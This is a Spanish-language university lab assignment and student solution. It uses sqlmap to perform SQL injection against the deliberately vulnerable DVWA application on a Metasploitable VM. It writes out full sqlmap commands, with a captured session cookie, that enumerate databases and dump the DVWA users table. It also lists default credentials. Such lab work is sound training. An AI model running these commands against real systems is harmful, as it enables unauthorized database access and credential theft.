Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Actividades
Trabajo: Realizar ataques SQL Injection contra la aplicación
DVWA
En la siguiente actividad deberás realizar diversos ataques sobre la aplicación DVWA
utilizando la técnica de SQL injection.
Para ello, debes utilizar la herramienta SQLMap (instalada en Kali por defecto).
Se valorará positivamente que expliques debidamente los pasos seguidos para la
realización de cada ataque.
Tendrás que:
» Indicar cuál/cuáles son los parámetros vulnerables de la URL.
» Obtener los nombres de las bases de datos disponibles.
» Recuperar los nombres de las tablas de la base de datos dvwa.
» Recuperar el contenido de las tablas de la base de datos dvwa.
Extensión máxima: 10 páginas (Georgia 11 e interlineado 1,5).
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Solución
Para el desarrollo de la solución utilizaremos un entorno virtual con dos máquinas
virtuales, siendo la primera la maquina victima (Metasploitable) ya que tiene
configurada la aplicación DVWA y como maquina atacante (Kali Linux) la misma que
tiene instalado SQLMAP.
Primero comprobamos que tanto la maquina atacante como la victima estén en la misma
red.
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Desde la maquina atacante accedemos a un navegador web de preferencia Firefox y
digitamos la direccion de la maquina victima para el caso [Link] y seleccionamos
la aplicación DVWA.
Se mostrara la siguiente pantalla las credenciales por defecto son:
Usurio: admin
Password: password
Prepararemos el nivel de seguridad de la plataforma DVWA, para facilitar el entorno de
ataque situándolo en seguridad baja.
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Indicar cuál/cuáles son los parámetros vulnerables de la
URL.
Para identificar los parámetros vulnerables de la URL hacemos clic en el menú lateral
en la opción “SQL Ijection” y seguidamente en el botón Submit.
Al hacer clic en el botón Submit nuestra URL cambia ya que utiliza el metodo GET
para obtener la información ingresada y muestra el parametro vulnerable “id”
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Obtener los nombres de las bases de datos disponibles.
Con la ayuda del complemento de Firefox “Http Header Live” obtenemos el User-Agent
y las Cookies necesarios para utilizar SQLMap.
Una vez obtenidos los datos anteriores
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0
Cookie: security=low; PHPSESSID=a4b159de41451243956c86cb3371bc77
Con el siguiente comando podemos obtener los nombres de las bases de datos
disponibles.
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"[Link] --dbs
Al finalizar la ejecución nos mostrara información sobre el sistema operativo, motor de
base de datos y la lista de bases disponibles.
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Recuperar los nombres de las tablas de la base de datos
dvwa.
Para recuperar las tablas de la base de datos dvwa al comando utilizado en el punto
anterior le cambiamos ciertos parámetros
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"[Link]
-D dvwa --tables
Al finalizar la ejecución nos retorna la información que necesitamos.
Recuperar el contenido de las tablas de la base de datos
dvwa.
De similar forma para este punto cambiaremos parte del comando del punto 1
agregando los parámetros que se muestran a continuación.
Tabla guestbook
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"[Link]
--dump --batch -T guestbook -D dvwa
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Esperamos que finalice la ejecucion de la instrucción nos retorna.
Tabla users
sqlmap --headers=” Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101
Firefox/61.0” --cookie=” security=low;
PHPSESSID=a4b159de41451243956c86cb3371bc77” -u
"[Link]
--dump --batch -T users -D dvwa
Al finalizar nos retorna la tabla con los datos de los usuarios como se muestra a
continuación.
Verificación de usuarios obtenidos.
Utilizamos uno de los usuarios obtenidos en el punto anterior en la pantalla de login de
la aplicación.
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)
Asignatura Datos del alumno Fecha
Apellidos:
Análisis de
vulnerabilidades
Nombre:
Parámetros SQLMap utilizados
-- headers Encabezados adicionales
-- cookie Valor del encabezado http cookie
-- dbs Enumerar bases de datos DBMS
-D Base de datos DBMS para enumerar
-- tables Enumerar tablas de base de datos DBMS
-- dump Volcado de DBMS
-- batch Nunca solicite la entrada del usuario, usar predeterminado
-T Tabla (s) de base de datos DBMS para enumerar
TEMA 3 – Actividades © Universidad Internacional de La Rioja, S. A. (UNIR)